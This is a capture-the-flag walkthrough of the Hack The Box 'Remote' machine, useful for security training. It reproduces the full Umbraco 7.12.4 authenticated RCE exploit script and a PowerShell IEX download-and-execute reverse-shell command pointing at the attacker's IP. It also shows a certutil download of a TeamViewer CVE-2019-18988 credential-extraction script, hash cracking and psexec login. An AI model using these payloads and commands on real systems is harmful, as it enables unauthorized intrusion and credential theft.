remote - hack the box

Remote is an vulnerable Windows machine that features an Umbraco CMS installation. Credentials are found in a misconfigured NFS share.

With these credentials, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password to continue further testing.

https://app.hackthebox.com/machines/234/information

Enumeration

Target IP: 10.129.230.172 Attacker IP: 10.10.14.92

nmap -sCVS 10.129.230.172

21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-08T10:16:04
|_  start_date: N/A
|_clock-skew: 59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

We head over to the web page at: http://10.129.230.172

alt text

It looks like a standard portfolio / store.

alt text

Umbraco keeps popping up on the site. Umbraco is a free and open-source .NET-based content management system (CMS) used for building and managing websites.

We find a login page at http://10.129.230.172/umbraco

alt text

We have no credentials for this page so lets do some more digging.

NFS Share

Lets see if the NFS Share has any important intel.

showmount -e 10.129.230.172

alt text

We find a mount that is accessible globally, /sites_backup. We can go ahead and mount this and view the contents.

sudo mount -t nfs 10.129.230.172:/site_backups /mnt/

alt text

There are a ton of folders we can search through. Some quick google-fu on Umbraco documentation and database location gives us a better idea of what lower hanging fruit we can pick first.

alt text

We head over to the App_Data folder and find Umbraco.sdf. We run strings on the database file to see if we can easily find some credentials.

strings Umbraco.sdf | grep 'admin'

alt text

We find a SHA1 hash that we can likely crack.

SHA1 & Hashcat

[email protected]:b8be16afba8c314ad33d812f22a04991b90e2aaa

We run hashcat on this hash in mode 100 which is for standard SHA1 input.

hashcat -m 100 hash ~/Downloads/rockyou.txt

alt text

We find a secure password

[email protected]:baconandcheese

alt text

We try these credentials to log into the CMS and are able to do so!

Umbraco 7.12.4 RCE

With some further enumeration on the site we are able to obtain a version number.

alt text

We find that this version is likely vulnerable to an authenticated RCE attack.

https://www.exploit-db.com/exploits/49488

# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) 
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

We try the script and it does run and givte us an output.

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c whoami

alt text

It looks like this script is abusing the vulnerable web page at /umbraco/developer/Xslt/xsltVisualize.aspx

The page allows a user to visualize and encode/decode XSLT, which is basically a tool used to convert XML documents into other formats, hence why our payload is in XML format.

<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

With the script, we will try to establish a reverse shell with our target.

I first create a .ps1 script. I use this great website: https://www.revshells.com/

(I would keep this website bookmarked, it has helped me many times when needing to quickly establish a shell.) I create a Powershell reverse shell script which is encoded in base64.

We start a simple python http server in the directory where we have our reverse shell powerscript shell saved

python -m http.server 80

We are then able to execute the RCE exploit and grab the file from our http server, then we can go ahead and execute the file.

alt text

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.92/revshell.ps1')"

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c powershell.exe -a ".\revshell.ps1"

alt text

We are in!

Privilege Escalation - TeamViewer

While grabbing our first flag we found and interesting link on the Public desktop

alt text

We see TeamViewer, and a lot of the older versions are vulnerable to local credential disclosure exploits, this may be one of them.

It looks like CVE-2019-18988 may be our way in, I found an exploit script here https://github.com/mr-r3b00t/CVE-2019-18988/blob/master/manual_exploit.bat

This script just easily parses out the information we need from the registry, and it is also helpful by providing us with a recipe we can use with cyberchef to decrypt the AES string. You can find the tool that we will be using here: https://gchq.github.io/CyberChef/

We transfer it from our http server to our target machine

certutil.exe -urlcache -split -f http://10.10.14.92/manual_exploit.bat C:/Users/Public/manual_exploit.bat

We run the batch and see what we get!

.\manual_exploit.bat

From the script output we get a cyberchef recipe we can use

alt text

AES_Decrypt({'option':'Hex','string':'0602000000a400005253413100040000'},{'option':'Hex','string':'0100010067244F436E6762F25EA8D704'},'CBC','Hex','Raw',{'option':'Hex','string':''})Decode_text('UTF-16LE (1200)')

This essentially just fills in the parameters we need to be able to get a valid output, such as our key, IV, and other variables involved in AES encryption.

We can also take the SecurityPasswordAES field that was extracted from the registry and use it as our input.

SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B

alt text

alt text

We get a password, !R3m0te!

Lets see if this works with our Administrator account

impacket-psexec 'administrator:[email protected]'

We have system access! pwned

alt text

 

pwnand.win

2025-07-08

On this page: